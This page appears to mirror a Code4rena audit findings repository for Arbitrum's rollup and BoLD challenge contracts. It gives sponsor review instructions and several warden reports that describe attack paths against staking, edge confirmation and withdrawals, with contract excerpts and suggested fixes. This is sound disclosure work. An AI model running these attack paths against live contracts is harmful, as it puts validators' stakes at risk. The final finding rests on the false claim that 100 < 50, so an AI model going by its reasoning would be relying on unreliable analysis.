GithubHelp home page GithubHelp logo

2024-05-arbitrum-foundation-findings's Introduction

Arbitrum Foundation Audit

Audit findings are submitted to this repo.

Unless otherwise discussed, this repo will be made public after audit completion, sponsor review, judging, and issue mitigation window.

Contributors to this repo: prior to report publication, please review the Agreements & Disclosures issue.

Note that when the repo is public, after all issues are mitigated, your comments will be publicly visible; they may also be included in your C4 audit report.


Review phase

Sponsors have three critical tasks in the audit process: Reviewing the two lists of curated issues, and once you have mitigated your findings, sharing those mitigations.

  1. Respond to curated High- and Medium-risk submissions ↓
  2. Respond to curated Low-risk submissions ↓
  3. Share your mitigation of findings (optional) ↓

Note: It’s important to be sure to only review issues from the curated lists. There are two lists of curated issues to review, which filter out unsatisfactory issues that don't require your attention.


      

Types of findings

(expand to read more)

High- or Medium-risk findings

Wardens submit issues without seeing each other's submissions, so keep in mind that there will always be findings that are duplicates. For all issues labeled 3 (High Risk) or 2 (Medium Risk), these have been pre-sorted for you so that there is only one primary issue open per unique finding. All duplicates have been labeled duplicate, linked to a primary issue, and closed.

QA reports and Gas reports

Any warden submissions in these two categories are submitted as bulk listings of issues and recommendations:

  • QA reports include all low severity findings and governance/centralization risk findings from an individual warden.
  • Gas reports (if applicable) include all gas optimization recommendations from an individual warden.

1. Respond to curated High- and Medium-risk submissions

This curated list will shorten as you work. View the original, longer list →

For each curated High- or Medium-risk finding, please:

1a. Label as one of the following:

  • sponsor confirmed, meaning: "Yes, this is a problem and we intend to fix it."
  • sponsor disputed, meaning either: "We cannot duplicate this issue" or "We disagree that this is an issue at all."
  • sponsor acknowledged, meaning: "Yes, technically the issue is correct, but we are not going to resolve it for xyz reasons."

Add any necessary comments explaining your rationale for your evaluation of the issue.

Note: Adding or changing labels other than those in this list will be automatically reverted by our bot, which will note the change in a comment on the issue.

1b. Weigh in on severity

If you believe a finding is technically correct but disagree with the listed severity, leave a comment indicating your reasoning for the judge to review. For a detailed breakdown of severity criteria and how to estimate risk, please refer to the judging criteria in our documentation.

Judges have the ultimate discretion in determining validity and severity of issues, as well as whether/how issues are considered duplicates. However, sponsor input is a significant criterion.


2. Respond to curated Low-risk submissions

This curated list will shorten as you work. View the original, longer list →

  • Leave a comment for the judge on any reports you consider to be particularly high quality.
  • Add the sponsor disputed label to any reports that you think should be completely disregarded by the judge, i.e. the report contains no valid findings at all.

Once Step 1 and 2 are complete

When you have finished labeling and responding to findings, drop the C4 team a note in your private Discord backroom channel and let us know you've completed the sponsor review process. At this point, we will pass the repo over to the judge to review your feedback while you work on mitigations.


3. Share your mitigation of findings (Optional)

Once you have confirmed the findings you intend to mitigate, you will want to address them before tha audit report is made public. Linking your mitigation PRs to your audit findings enables us to include them in your C4 audit report.

Note: You can work on your mitigations during the judging phase -- or beyond it, if you need more time. We won't publish the final audit report until you give us the OK.

If you are planning a Code4rena mitigation review:

  1. In your own Github repo, create a branch based off of the commit you used for your Code4rena audit, then
  2. Create a separate Pull Request for each High or Medium risk C4 audit finding that you confirmed (e.g. one PR for finding H-01, another for H-02, etc.)
  3. Link the PR to the issue that it resolves within your audit findings repo. (If the issue in question has duplicates, please link to your PR from the open/primary issue.)

Most C4 mitigation reviews focus exclusively on reviewing mitigations of High and Medium risk findings. Therefore, QA and Gas mitigations should be done in a separate branch. If you want your mitigation review to include QA or Gas-related PRs, please reach out to C4 staff and let’s chat!

If several findings are inextricably related (e.g. two potential exploits of the same underlying issue, etc.), you may create a single PR for the related findings.

If you aren’t planning a mitigation review

  1. Within a repo in your own GitHub organization, create a pull request for each finding.
  2. Link the PR to the issue that it resolves within your audit findings repo. (If the issue in question has duplicates, please link to your PR from the open/primary issue.)

This will allow for complete transparency in showing the work of mitigating the issues found in the audit.

2024-05-arbitrum-foundation-findings's People

Contributors

howlbot-integration[bot] avatar liveactionllama avatar c4-bot-8 avatar c4-bot-2 avatar c4-bot-1 avatar c4-bot-10 avatar c4-bot-7 avatar aks- avatar cloudellie avatar jacobheun avatar c4-bot-3 avatar c4-bot-4 avatar c4-bot-5 avatar c4-bot-6 avatar c4-bot-9 avatar code4rena-id[bot] avatar itsmetechjay avatar

Stargazers

 avatar Mahmood Ansari avatar manijeh avatar

Watchers

 avatar Michael W. Hanna avatar Bronze Pickaxe avatar

Forkers

sabatha7 hmdyuck

2024-05-arbitrum-foundation-findings's Issues

Adversary can force honest party to lose stake to challenge their incorrect edges

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L608-L610

Vulnerability details

Impact

Once an correct edge is confirmed, it can no longer be bisected. If its rivals reaches the same position, honest party must create another invalid edge and lose the stake in order to challenge that rival. Otherwise incorrect edges could be confirmed.

Proof of Concept

According to the contest doc

Attack ideas (where to focus for bugs)
Assuming there is at least one honest participant, no incorrect assertions or edges can be confirmed.

Suppose a correct assertion and an incorrect assertion are having a battle. They now disagree on a length one edge of level 4. Then, honest party creates an layer 0 edge Y in level 5. After some time, Y accumulates enough unrivaled time and gets confirmed. Then the adversary creates another layer 0 edge N at the same position, and bisected it. Since the Y is already confirmed, it can no longer be bisected.

function bisectEdge(EdgeStore storage store, bytes32 edgeId, bytes32 bisectionHistoryRoot, bytes memory prefixProof)
    internal
    returns (bytes32, EdgeAddedData memory, EdgeAddedData memory)
{
    if (store.edges[edgeId].status != EdgeStatus.Pending) {
        revert EdgeNotPending(edgeId, store.edges[edgeId].status);
    }

If the honest party wishes to rival N, they will need to stake on another invalid edge at level 5 layer 0, which can be continuously bisected. But by doing so, honest party will lose the stake.

Otherwise, although F cannot be confirmed since T is already confirmed,

  1. the ancestors of F, and the corresponding assertion, can accumulate unrivaled time, which may help the adversary win the challenge game.
  2. the descendants of F cannot be rivaled either, and they will eventually be confirmed, which breaks the invariant no incorrect assertions or edges can be confirmed.

Tools Used

Manual

Recommended Mitigation Steps

Allow confirmed edges to be bisected.

Assessed type

Context

Users can create assertion with stale `baseStake` amount

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/assertionStakingPool/AssertionStakingPool.sol#L40-L46
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L177-L182
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupCore.sol#L492
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupCore.sol#L69-L70
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupAdminLogic.sol#L223-L226

Vulnerability details

Impact

This breaks core protocol functionality because it lead to a situation where assertions are created by a user whose stake is below the current baseStake amount.

Proof of Concept

Users can create assertion once required stake amount is reached by calling AssertionStakingPool::createAssertion(...) . The call trace is as shown below

  AssertionStakingPool::createAssertion(...)
   ->RollupUserLogic::newStakeOnNewAssertion(...)
@> -->RollupUserLogic::stakeOnNewAssertion(...)
   ---> RollupCore::createNewAssertion(...)

New assertions build on the configData of their parent assertion and as such the RollupUser(rollup)::stakeOnNewAssertion(...) implements a check to ensure that the user creating a new assertion is sufficiently staked with respect to the baseStake value at the time the parent assertion was created as seen on L182 below

File: RollupUserLogic.sol
163:     function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
164:         public
165:         onlyValidator
166:         whenNotPaused
167:     {
...
175:         require(isStaked(msg.sender), "NOT_STAKED");
176: 
177:         // requiredStake is user supplied, will be verified against configHash later
178:         // the prev's requiredStake is used to make sure all children have the same stake
...
182:@>       require(amountStaked(msg.sender) >= assertion.beforeStateData.configData.requiredStake, "INSUFFICIENT_STAKE");
183: 

However the problem lies in the validation on L182 in the RollupUser(rollup)::stakeOnNewAssertion(...) function, because the value of baseStake can be updated by the rollup owner, if the baseStake value is increased before this new assertion is created and the current amountStaked(msg.sender) is less than this new baseStake amount, a user can still successfully create an assertion. This breaks the core protocol functionality because despite raising the bar for honesty in the system users are still able to create assertions with less than the current base stake required by the system.

Also, when the new assertion is finally created the config is set to the new baseStake as shown below (on L492) but this does not the assertion user from creating the assertion with less than required amount successfully

File: RollupCore.sol
487:         // state updates
488:         AssertionNode memory newAssertion = AssertionNodeLib.createAssertion(
489:             prevAssertion.firstChildBlock == 0, // assumes block 0 is impossible
490:             RollupLib.configHash({
491:                 wasmModuleRoot: wasmModuleRoot,
492: @>              requiredStake: baseStake,
493:                 challengeManager: address(challengeManager),
494:                 confirmPeriodBlocks: confirmPeriodBlocks,
495:                 nextInboxPosition: uint64(nextInboxPosition)
496:             })
497:         );

POC Summary

  • Assume current baseStake is 100ETH
  • Alice creates assertion: batch 5, blockhash 0xabc with configData.requiredStake = 100ETH
  • Admin calls RollupAdminLogic::setBaseStake(...) to increase baseStake to 120ETH
  • current baseStake = 120ETh
  • Bob whose amountStaked(msg.sender) = 101ETH creates assertion: batch 10, blockhash 0x123 but his stake is checked to be greater than 100ETH instead of 120ETH
182:@>       require(amountStaked(msg.sender) >= assertion.beforeStateData.configData.requiredStake, "INSUFFICIENT_STAKE");
  • Bobs assertion is successfully created

As you can see this, although asset are not at direct risk, but the functionality of the protocol is impacted allowing users to create assertions with less than the minimum amount staked required by the system (and this could be a hypothetical attack path because assertions are created using stale baseStake value)

Tools Used

Manual review

Recommended Mitigation Steps

Modify the RollupUserLogic::stakeOnNewAssertion(...) as shown below

File: RollupUserLogic.sol
163:     function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
164:         public
165:         onlyValidator
166:         whenNotPaused
167:     {
...

...
182:   -     require(amountStaked(msg.sender) >= assertion.beforeStateData.configData.requiredStake, "INSUFFICIENT_STAKE");
182:   +     require(amountStaked(msg.sender) >= baseStake, "INSUFFICIENT_STAKE");
183: 

Assessed type

Invalid Validation

`checkClaimIdLink` does not check `ClaimId`

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L683-L710

Vulnerability details

Impact

checkClaimIdLink does not check ClaimId, and a terminal node can inherit timers which it does not deserve.

Proof of Concept

According to BoLD paper section 5.4, suppose A, B are terminal nodes which rivals each other (aka shares the same mutualId), and A has children a1, a2, B has children b1, b2, b3. The five children share the same origin id (which is A,B's mutualId).

We should have
β(A,t) := λ(A,t) + max{β(a1,t), β(a2,t), β(a3,t)}
β(B,t) := λ(B,t) + max{β(b1,t), β(b2,t)}

    function checkClaimIdLink(EdgeStore storage store, bytes32 edgeId, bytes32 claimingEdgeId, uint8 numBigStepLevel)
        private
        view
    {
        // the origin id of an edge should be the mutual id of the edge in the level below
        if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) {
            revert OriginIdMutualIdMismatch(store.edges[edgeId].mutualId(), store.edges[claimingEdgeId].originId);
        }
        // the claiming edge must be exactly one level below
        if (nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) != store.edges[claimingEdgeId].level) {
            revert EdgeLevelInvalid(
                edgeId,
                claimingEdgeId,
                nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel),
                store.edges[claimingEdgeId].level
            );
        }
    }

However, in our implementation, we only check the originId of the children matches the mutualId of the parent.
We can actually set β(A,t) := λ(A,t) + β(b1,t), which means an edge can inherit timer from its rival's children!
Even worse, all of a1, a2, a3, b1, b2's descendants at the same level will share the same originId. We can start from a (proved) proof node at level N, by using it as claimingEdgeId and using its level N-1 length 1 ancestor (or the ancestor's rival) as edgeId, we can set edgeId's timer to type(uint64).max. By repeating so, we can almost instantly confirm any level 0 length 1 edge.

            // when bisecting originId is preserved
            ChallengeEdge memory lowerChild = ChallengeEdgeLib.newChildEdge(
                ce.originId, ce.startHistoryRoot, ce.startHeight, bisectionHistoryRoot, middleHeight, ce.level
            );

Tools Used

Manual

Recommended Mitigation Steps

require(store.edges[claimingEdgeId].claimId == edgeId);

Assessed type

Context

Withdrawals can be delayed in some conditions

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupCore.sol#L565-L574

Vulnerability details

Impact

Extending the delay of withdrawals

Proof of Concept

The maximum delay for withdrawals from L2 to L1 can be up to approximately 1 week (specifically 6.4 days), primarily due to the challenge period inherent in the optimistic rollup design used by Arbitrum. This challenge period is a security mechanism that allows validators to dispute state assertions before they are finalized on the L1 Ethereum blockchain.

The reason for this delay is rooted in the dispute resolution process. When a state assertion is made on the L2 chain, there is a fixed period during which it can be challenged. This is to ensure that only valid state transitions are confirmed on the L1 chain. If a dispute arises, it must be resolved within this period, and only after the period expires without disputes, or after a dispute is resolved in favor of the assertion, can the withdrawal be finalized on L1.

But this could be somehow bricked with an aditional period of time for specific conditions.

Validators can call newStakeOnNewAssertion and their funds will be taken on stake while the new assertion created in RollUpCore;

The function is as below:

Contract: RollupUserLogic.sol

363:     function newStakeOnNewAssertion( 
364:         uint256 tokenAmount,
365:         AssertionInputs calldata assertion,
366:         bytes32 expectedAssertionHash,
367:         address withdrawalAddress
368:     ) public {
369:         require(withdrawalAddress != address(0), "EMPTY_WITHDRAWAL_ADDRESS");
370:         _newStake(tokenAmount, withdrawalAddress);
371:         stakeOnNewAssertion(assertion, expectedAssertionHash);
372:         /// @dev This is an external call, safe because it's at the end of the function
373:         receiveTokens(tokenAmount); 
374:     }

L:371 calls stakeOnNewAssertion in the same contract.

Contract: RollupUserLogic.sol

173:     function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)

And when the stakers want to withdraw their stakes, the first function to call is as follows:

Contract: RollupUserLogic.sol

240:     /**
241:      * @notice Refund a staker that is currently staked on an assertion that either has a chlid assertion or is the latest confirmed assertion.
242:      */
243:     function returnOldDeposit() external override onlyValidator whenNotPaused {
244:         requireInactiveStaker(msg.sender);
245:         withdrawStaker(msg.sender);
246:     }

So the staker should be inactive - validated by requireInactiveStaker
And the funds should be made withdrawable by withdrawStaker

The logic of the requireInactiveStaker is as below;

Contract: RollupCore.sol

614:     function requireInactiveStaker(address stakerAddress) internal view { 
615:         require(isStaked(stakerAddress), "NOT_STAKED");
616:         // A staker is inactive if
617:         // a) their last staked assertion is the latest confirmed assertion
618:         // b) their last staked assertion have a child
619:         bytes32 lastestAssertion = latestStakedAssertion(stakerAddress);
620:         bool isLatestConfirmed = lastestAssertion == latestConfirmed();
621:         bool haveChild = getAssertionStorage(lastestAssertion).firstChildBlock > 0; 
622:         require(isLatestConfirmed || haveChild, "STAKE_ACTIVE");
623:     } 

As can be seen that, the staker´s latest assertion should be latest confirmed one - Honest Stake
OR
There should be a child block of the new assertion.
If any of these suffice, the staker can initiate to withdraw their stakes.

This opens a possibility for the attacker to delay the withdrawals.

When an dishonest actor stakes on a new assertion by newStakeOnNNewAssertion for a prevAssertion, they should be rivaled by edges.

If the attacker creates a new stake for an assertion (prevAssertion) which was challenged and has childs, they would be eligible to withdraw their funds as per requireInactiveStakerfunction, L:621

Since the attacker´s latestStakedAssertion has already a child - and registered as _latestConfirmed in RollupCore.createNewStake as below, they can just stake and create arbitrary expectedAssertionHash.

Contract: RollupCore.sol

288:     function createNewStake(
289:         address stakerAddress,
290:         uint256 depositAmount,
291:         address withdrawalAddress
292:     ) internal {
293:         uint64 stakerIndex = uint64(_stakerList.length);
294:         _stakerList.push(stakerAddress);
295:         _stakerMap[stakerAddress] = Staker(
296:             depositAmount,
297:  >>         _latestConfirmed, //@audit latestStakedAssertion == _latestConfirmed
298:             stakerIndex,
299:             true,
300:             withdrawalAddress 
302:         emit UserStakeUpdated(stakerAddress, withdrawalAddress, 0, depositAmount);
303:     }

So once the expectedAssertionHash is challenged - which they can do with their other account as well, the attacker only need to wait in order no to waste small stakes in bisections and challenges.
Accordingly the attacker can frontrun confirmEdgeByTime by calling returnOldDeposit.
This will make the attacker funds withdrawable and the attacker will succeed to make the withdrawals wait for a period of max challengePeriod + first rivaling time.

Tools Used

Manual Review

Recommended Mitigation Steps

Let the withdrawal mechanism have a short timelock

Assessed type

Other

Wrong usage of origin checking in sequence inbox

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/bridge/SequencerInbox.sol#L577
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/bridge/SequencerInbox.sol#L601

Vulnerability details

Impact

Batch posters will not get their gas fees reimbursed.

Proof of Concept

Using Arbitrum's SequencerInbox contract, sequencers(or aka batch posters) submit tx batches through some methods like addSequencerL2Batch or addSequencerL2BatchDelayProof.
The sequencers get their gas fee reimbursed based on the length of the data they post, as the following code snippet shows. SequencerInbox.sol#L818-L821

if (calldataLengthPosted > 0 && !isUsingFeeToken) {
    // only report batch poster spendings if chain is using ETH as native currency
    submitBatchSpendingReport(dataHash, seqMessageIndex, block.basefee, 0);
}

However, in addSequencerL2Batch and addSequencerL2BatchDelayProof functions, they pass false as isFromOrigin flag, regardless of msg.sender.
In fact, these functions are called by either whitelisted EOA batch posters or the rollup contract, which means when these functions are called by whitelisted EOA batch posters, they will not be able to get their gas fees reimbursed.

Tools Used

Manual Review

Recommended Mitigation Steps

It should check if msg.sender is an EOA and pass true if that's the case.

addSequencerL2BatchFromCalldataImpl(
    sequenceNumber,
    data,
    afterDelayedMessagesRead,
    prevMessageCount,
    newMessageCount,
-   false
+   msg.sender == tx.origin
);

Assessed type

Context

The staker that lost the challenge dispute game can still withdraw his stake

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L358

Vulnerability details

Impact

In the current implementation of the RollupUserLogic, a new assertion can only be created if a user staked the requiredStake amount and therefore became a validator. If there are 2 children of the previous assertion, challenge dispute game can be started and the second child has to send his amount to the loserStakeEscrow. The problem is that it's not somehow reflected in the RollupCore mapping structure and therefore the user can possibly request a withdraw after the finish of the dispute.

Proof of Concept

Let's say there are 2 assertions: A and B. The first assertion stakes the required amount and suggest a new assertion:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L175

 require(isStaked(msg.sender), "NOT_STAKED");

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L182

require(amountStaked(msg.sender) >= assertion.beforeStateData.configData.requiredStake, "INSUFFICIENT_STAKE");

And the mapping in RollupCore is also updated:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L277

_stakerMap[stakerAddress] = Staker(depositAmount, _latestConfirmed, stakerIndex, true, withdrawalAddress);

When the second assertion (B) is created, the process is the same and but the stake is transferred to the loserStakeEscrow as it's the second child:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L210-216

 if (!getAssertionStorage(newAssertionHash).isFirstChild) {
            // We assume assertion.beforeStateData is valid here as it will be validated in createNewAssertion
            // only 1 of the children can be confirmed and get their stake refunded
            // so we send the other children's stake to the loserStakeEscrow
            // NOTE: if the losing staker have staked more than requiredStake, the excess stake will be stuck
            IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
        }

The problem is that once assertion is confirmed, the second user can still withdraw his stake even if he submitted incorrect state:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L358-364

function withdrawStakerFunds() external override whenNotPaused returns (uint256) {
        uint256 amount = withdrawFunds(msg.sender);
        require(amount > 0, "NO_FUNDS_TO_WITHDRAW");
        // This is safe because it occurs after all checks and effects
        IERC20(stakeToken).safeTransfer(msg.sender, amount);
        return amount;
    }

By doing this, he bypasses the protocol requirement of the malicious party's stake to be taken in the case of submitting malicious assertion.

Tools Used

Manual review.

Recommended Mitigation Steps

Set some flag for the second assertion when the first assertion is confirmed.

Assessed type

Other

Adversary can make honest parties unable to retrieve their assertion stakes if the required amount is decreased

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L180

Vulnerability details

Impact

When the required stake (to create a new assertions) is updated to a lower amount, adversary can make the honest party unable to retrieve their assertion stakes.

Proof of Concept

 A -- B -- C -- D(latest confirmed) -- E

Suppose the initial stake amount is 1000 ETH, and till now no invalid assertions have been made. (A, B, C, D, E are all valid and made by the same validator). The rollup contract should hold 1000 ETH now.

 A -- B -- C -- D(latest confirmed) -- E
                                    \
                                     \ F(invalid)

Then, the admin update the required stake to 700 ETH, Alice made an invalid assertion F. Since its parent D was created before the update, Alice will still need to stake 1000 ETH, and the 1000 ETH will be sent to loserStakeEscrow.

        if (!getAssertionStorage(newAssertionHash).isFirstChild) {

            // only 1 of the children can be confirmed and get their stake refunded
            // so we send the other children's stake to the loserStakeEscrow
            IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
        }
 A -- B -- C -- D(latest confirmed) -- E
                                    \

                                     \ F -- G

(a) Alice creates F's children, G. Now, only 700 ETH of stake is needed. However, as the comment suggests, no refund will be made since G's ancestor could need more stake.

        // requiredStake is user supplied, will be verified against configHash later
        // the prev's requiredStake is used to make sure all children have the same stake
        // the staker may have more than enough stake, and the entire stake will be locked
        // we cannot do a refund here because the staker may be staker on an unconfirmed ancestor that requires more stake
        // excess stake can be removed by calling reduceDeposit when the staker is inactive
        require(amountStaked(msg.sender) >= assertion.beforeStateData.configData.requiredStake, "INSUFFICIENT_STAKE");

(b) To bypass the limit in (a), Alice calls her friend Bob to make the assertion G instead , Bob will only need to stake 700 ETH now. The rollup contract currently holds 1700 ETH. Then, Alice can withdraw her stake since she is no longer active. (her last staked assertion have a child)

    function requireInactiveStaker(address stakerAddress) internal view {
        require(isStaked(stakerAddress), "NOT_STAKED");
        // A staker is inactive if
        // a) their last staked assertion is the latest confirmed assertion
        // b) their last staked assertion have a child
        bytes32 lastestAssertion = latestStakedAssertion(stakerAddress);
        bool isLatestConfirmed = lastestAssertion == latestConfirmed();
        bool haveChild = getAssertionStorage(lastestAssertion).firstChildBlock > 0;
        require(isLatestConfirmed || haveChild, "STAKE_ACTIVE");
    }

Now the rollup contract holds 700 ETH, which means it is insolvent. The honest validator cannot withdraw her original stake. (700 < 1000)

Tools Used

Manual

Recommended Mitigation Steps

Ensure the following

  1. A staker is considered inactive only if her last staked assertion is confirmed.
  2. A staker can only stake on her last staked assertion's descendants. (otherwise Alice can switch to the correct branch and withdraw)

Assessed type

Context

incorrect assertion can be confirmed by abusing confirmEdgeByOneStepProof function

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L817-L818

Vulnerability details

incorrect assertion can be confirmed by abusing confirmEdgeByOneStepProof function

Impact

An attacker can create in one transaction an enough deep level of Edges for his own assertion to have the lower part of the commit history be confirmed by calling confirmEdgeByOneStepProof and in doing so have the entire non correct assertion, that is an assertion where the upper history commitment is manipulated by the attacker, approved which is a disaster for the protocol.

Proof of Concept

When Edges are created to contest an assertion and when we reach the level of NUM_BIGSTEP_LEVEL + 1 we are in small step mode where we can provide a single proof of inclusion to have our entire chain of edges be confirmed as the correct one.

On every edge creation the edges are split or bisected with bisectEdge method :

we get a lower and an upper edge child. In the begining we have a chain of (last approved assertion) -> (our assertion) by the first bisection we roughly get two child edge

the lower one Lower_step_1(last approved assertion + middle point)

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L633-L635

and the upper one Upper_step_1(middle point to our assertion)

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L646-L648

The attacker can drill till NUM_BIGSTEP_LEVEL + 1 by stepping on the lower part of the commitment history and finally create a valid lower child that represents only the lower part of commitment history which will pass the validation trough oneStepProofEntry.proveOneStep.

But the history commitment for the upper side can be a changed/manipulated one by the attacker. Having only the lower part correct we practically have our entire assertion confirmed as the correct one.

By providing a valid proof for a history commitment inclusion to this lower part we have our edge set as confirmed and also the totalTimeUnrivaledCache set to maximal uint64 value which signals that we have a correct history.

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L826-L830

All other rival edges (even the valid one) are now reverted with 'RivalEdgeConfirmed'.

By calling enough time updateTimerCacheByChildren and updateTimerCacheByClaim like is done in the test function updateTimers we can have our wrong assertion be the one included as the next correct assertion.

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L506-L511

The correct assertion cannot be approved becouse we can have only one chosen assertion (from the last one confirmed plus a fixed height/number of inbox messages) the other rival assertion are discarded (as a rival edge is reverted with RivalEdgeConfirmed) when the first one is approved. And by using confirmEdgeByOneStepProof we can have this done by a malicious user in one transaction.

Note: The POC as a code sample can be used the one from the test testCanConfirmByOneStep as the two main points here are to have all needed Edges constructed in one transaction in such way that will have lower history commitment included/confirmed on the last edge. And proveOneStep doesn't revert for the last small step Edge that checks the correct virtual machine is used from bytes32 cursor = edgeId;:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L798

to store.edges[edgeId].endHistoryRoot

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L822

Tools Used

Manual review

Recommended Mitigation Steps

One recommendation for solving this problem is to not allow one single account to play the "game" of rivaling edges by having a require that the rival edge is created by another account. This will enforce that playing this "game" is done in turns not just by one account. Something like this :

// for this to work we need a new `createdByStaker` ChallengeEdge attribute for all edges level not just the zero one (edge.staker)
 function add(EdgeStore storage store, ChallengeEdge memory edge) internal returns (EdgeAddedData memory) {
    ...
            if (firstRival == 0) {
            store.firstRivals[mutualId] = UNRIVALED;
        } else if (firstRival == UNRIVALED) {
+           require(store.edges[eId].createdByStaker != msg.sender, "not allowed")
            store.firstRivals[mutualId] = eId;
        } else {
            // after we've stored the first rival we dont need to keep a record of any
            // other rival edges - they will all have a zero time unrivaled
        }
    ...
 }

If this is not enough and the financial gain of the attacker is greater then loosing the bound for creating edges with two accounts. Trying to limit the amount of rival edges that can be created in one transaction could be also used to prevent one attacker (with two different accounts) to resolve the last edge in one transaction. Other non malicious stakers would monitor such behavior and interfere with the attacker intention. Something like (in the same add function as before):

uint created = store.createdIn[block.number][edgeId];
created += 1;
if (created > LIMIT_NUMBER_OF_EDGES_IN_ONE_TRANSACTION) {
    revert("number of max rival in block");
}
store.createdIn[block.number][edgeId] = created;

Assessed type

Other

Logical flaw in `_setBufferConfig` function that can lead to unexpected behavior and potentially incorrect state updates.

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/bridge/SequencerInbox.sol#L851-L856

Vulnerability details

Impact

_setBufferConfig function src\bridge\SequencerInbox.sol:847-865

The following lines: src\bridge\SequencerInbox.sol:851-855

if (buffer.bufferBlocks == 0 || buffer.bufferBlocks > bufferConfig_.max) {
    buffer.bufferBlocks = bufferConfig_.max;
}
if (buffer.bufferBlocks < bufferConfig_.threshold) {
    buffer.bufferBlocks = bufferConfig_.threshold;
}

The problem is that these two conditions are not mutually exclusive, and the second condition can override the first condition's assignment.

For example, if buffer.bufferBlocks is initially 0, and bufferConfig_.max is greater than bufferConfig_.threshold, the first condition will set buffer.bufferBlocks to bufferConfig_.max. However, the second condition will then immediately set buffer.bufferBlocks to bufferConfig_.threshold, effectively overriding the previous assignment.

This behavior is likely unintended and could lead to unexpected results.

Proof of Concept

The purpose of the _setBufferConfig function is to update the buffer configuration based on the provided bufferConfig_ parameters. However, the two conditional statements that update the buffer.bufferBlocks value have overlapping conditions, which can result in unintended behavior.

Here's a breakdown of the issue:

The first condition buffer.bufferBlocks == 0 || buffer.bufferBlocks > bufferConfig_.max checks if the current buffer.bufferBlocks value is either zero or greater than the new bufferConfig_.max value. If this condition is true, it sets buffer.bufferBlocks to bufferConfig_.max.

The second condition buffer.bufferBlocks < bufferConfig_.threshold checks if the current buffer.bufferBlocks value is less than the new bufferConfig_.threshold value. If this condition is true, it sets buffer.bufferBlocks to bufferConfig_.threshold.

The problem arises when bufferConfig_.threshold is less than bufferConfig_.max. In this case, the second condition can override the assignment made by the first condition, leading to an incorrect state update.

For example, consider the following scenario:

Initial state: buffer.bufferBlocks = 0
New configuration: bufferConfig_.max = 100, bufferConfig_.threshold = 50
In this scenario, the first condition buffer.bufferBlocks == 0 || buffer.bufferBlocks > bufferConfig_.max will be true, and buffer.bufferBlocks will be set to bufferConfig_.max = 100.

However, the second condition buffer.bufferBlocks < bufferConfig_.threshold will also be true (since 100 < 50), and buffer.bufferBlocks will be overwritten with bufferConfig_.threshold = 50.

This behavior is likely unintended, as it violates the expected logic of setting buffer.bufferBlocks to the maximum value (bufferConfig_.max) if it is initially zero or greater than the maximum.

